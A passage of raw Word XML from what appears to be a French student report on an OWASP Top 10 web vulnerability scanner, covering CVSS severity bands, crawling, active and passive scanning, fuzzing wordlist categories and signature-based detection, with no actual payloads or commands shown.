            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73B6B252" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Plage de score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42E3FC15" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Action recommandée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F4A9B0E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Délai de remédiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="01A04718" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1011AF5B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C80000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1180DF1F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17FC706C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correction immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A718FA3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 24 heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="06FE729D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7CD42640" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="DC7800"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="71CC70D7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4B11DCC5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correction prioritaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="074F445E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 7 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="2B3F56E2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7FA7CE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="B4A000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E558192" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7158A1EA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correction planifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70489314" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 30 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="47686CED" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="37F4F63E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4B976FB4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0BA53BAA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Correction à terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5CEE921E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 90 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="314BB541" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C27ACBF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="691ADD65" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46AC6CDE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Surveillance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD9602E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="407551B6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="6FCC7773" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="1" w:color="003366"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.7  Techniques de Détection Automatique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F69CC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.7.1  Crawling et Découverte d'Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A63B0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La première étape de tout scanner web est la découverte des surfaces d'attaque : l'ensemble des URLs, formulaires, paramètres GET/POST et endpoints d'API exposés par l'application cible. On distingue deux approches : le crawling statique (analyse du HTML retourné) et le crawling dynamique (exécution du JavaScript via un navigateur headless comme Playwright ou Puppeteer). Notre outil utilise un crawling statique BFS (Breadth-First Search) adapté aux applications majoritairement server-rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF5A10" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.7.2  Scan Actif vs Scan Passif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EECDB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan passif : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>analyse le trafic HTTP existant sans générer de requêtes supplémentaires. Non intrusif, il peut être intégré en production (proxy mode ZAP). Limité en couverture car ne teste que les paramètres effectivement utilisés par l'utilisateur légitime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71716D9D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan actif : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>envoie des requêtes spécialement forgées (payloads) pour provoquer des comportements révélateurs de vulnérabilités. Plus efficace en couverture mais intrusif — ne doit être utilisé que sur des environnements de test. Notre outil adopte cette approche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27871AFF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.7.3  Fuzzing et Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05235EF7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le fuzzing consiste à injecter des données semi-aléatoires ou basées sur des dictionnaires (wordlists) dans les paramètres d'entrée pour provoquer des comportements anormaux révélant des vulnérabilités. Notre outil utilise des wordlists ciblées pour chaque type de vulnérabilité, organisées dans le répertoire payloads/ :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FED14B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>sqli.txt : payloads SQLi (error-based, time-based, boolean, UNION) — 50+ entrées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0007E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>xss.txt : payloads XSS avec variations d'encodage et bypass de filtres — 40+ entrées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550F97DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ssrf.txt : URLs de métadonnées cloud, IPs internes, loopback — 30+ entrées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52422565" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>path_traversal.txt : séquences ../ avec encodages multiples — 25+ entrées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1764C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>xxe.txt : payloads XML avec entités externes file:// et http:// — 15+ entrées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23441CF3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.7.4  Détection par Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071759DE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chaque type de vulnérabilité génère des réponses caractéristiques détectables par analyse de signatures. Notre moteur de détection utilise des expressions régulières compilées (module re de Python) pour identifier ces marqueurs dans les réponses HTTP. Par exemple, pour les injections SQL, nous recherchons plus de 14 patterns d'erreurs couvrant MySQL, PostgreSQL, MSSQL, Oracle et SQLite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF46FB"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1.8  Synthèse et Positionnement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2E0E8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">L'analyse des outils existants met en évidence un vide dans l'offre actuelle : les solutions professionnelles (Burp Suite Pro, Acunetix) sont trop onéreuses pour les contextes académiques et les petites équipes, tandis que les outils gratuits (Nikto, ZAP) manquent soit de couverture, soit d'intégration facile dans un workflow Python/CI-CD. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Notre scanner se positionne précisément dans cet espace.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9122"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="29A5D4F3" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9122" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="003366"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="003366"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p w14:paraId="466ACFF7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="003366"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Positionnement de notre scanner OWASP Top 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB90C9B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 100 % open source et gratuit — aucune licence requise</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78254091" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Écrit en Python pur — intégrable dans tout workflow Python / CI-CD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482AE599" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Couverture 9/10 catégories OWASP Top 10 2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B70037" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • Scoring automatique CVSS v3.1 pour chaque vulnérabilité</w:t>
            </w:r>
          </w:p>
